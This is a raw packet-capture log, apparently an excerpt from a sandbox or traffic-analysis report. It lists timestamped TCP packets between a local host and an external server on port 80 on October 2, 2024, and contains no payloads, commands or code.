Oct 2, 2024 09:41:04.747915030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747950077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747980118 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748003960 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748058081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748089075 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748091936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748143911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748181105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748184919 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748228073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748259068 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748281956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748316050 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748346090 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748349905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748383999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748413086 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748419046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748451948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748481989 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748487949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748522043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748550892 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748557091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748596907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748625994 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748631001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748665094 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748693943 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748697996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748733997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748763084 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748769999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748804092 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748833895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748861074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748898029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748929024 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.748931885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748967886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.748996973 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749001026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749054909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749084949 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749089003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749123096 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749154091 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749156952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749211073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749242067 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749244928 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749281883 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749311924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749316931 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749351978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749382019 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749385118 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749418020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749448061 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749450922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749485970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749515057 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749520063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749553919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749583960 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749588013 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749622107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749653101 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749659061 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749695063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749725103 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749872923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749922991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749954939 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.749957085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.749989986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750020981 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750025034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750066996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750085115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750093937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750102997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750119925 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750128984 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750138044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750155926 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750166893 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750174046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750202894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750221014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750251055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750260115 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750260115 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750272989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750289917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750302076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750307083 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750324965 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750335932 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750343084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750360966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750372887 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750377893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750396967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750406027 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750845909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.750966072 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.750998974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751023054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751039028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751056910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751072884 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751082897 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751092911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751110077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751121998 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751125097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751152039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751153946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751172066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751188993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751205921 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751221895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751233101 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751251936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751270056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751288891 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751298904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751307011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751323938 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751332998 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751343966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751360893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751370907 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751379967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751410007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751415014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751713037 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751740932 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751776934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751804113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751821995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751831055 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751841068 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751859903 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751867056 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.751957893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.751985073 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752022982 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752041101 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752067089 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752068043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752085924 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752104044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752113104 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752123117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752149105 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752238989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752255917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752271891 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752285957 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752285957 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752289057 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752307892 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752325058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752343893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752371073 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752413988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752430916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752445936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752461910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752473116 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752480030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752490044 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752496958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752513885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752523899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752530098 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752548933 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752557039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752654076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.752968073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.752984047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753000975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753026009 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753029108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753046989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753062963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753072023 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753083944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753106117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753113031 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753122091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753139019 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753156900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753168106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753180027 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753182888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753200054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753213882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753248930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753266096 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753273964 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753283024 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753299952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753307104 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.753318071 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.753694057 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.754486084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754568100 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754584074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754611015 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.754612923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754631996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754642963 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.754652023 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754678011 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.754692078 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.754796028 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755151033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755218983 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755297899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755316973 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755332947 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755368948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755400896 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755407095 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755454063 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755636930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755661964 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755677938 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755707026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755722046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755740881 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755750895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755759954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755779028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755789042 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755825043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755841017 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755851984 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755867958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755883932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755901098 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755903006 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755928993 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.755947113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755970955 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.755995989 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756006956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756023884 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756050110 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756057978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756109953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756135941 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756176949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756194115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756220102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756330967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756347895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756375074 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756375074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756393909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756409883 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756418943 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756438971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756454945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756465912 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756472111 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756489992 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756519079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756535053 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756546021 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756551981 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756570101 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756577015 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756588936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756613970 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756665945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756681919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756697893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756706953 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756716013 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756732941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756742001 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756751060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756767035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756778955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.756784916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756803036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.756813049 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757249117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757265091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757276058 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757285118 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757306099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757311106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757324934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757349968 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757488012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757503986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757529020 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757534027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757550001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757566929 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757575035 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757586956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757669926 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757685900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757697105 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757702112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757720947 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757730007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757740021 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757757902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757766008 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757824898 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757841110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757852077 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757858038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757874966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757884979 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757893085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757910013 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757920027 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757926941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757941961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757951975 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757960081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757977009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.757985115 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.757994890 CEST	80	49734	147.45.44.104	192.168.2.4
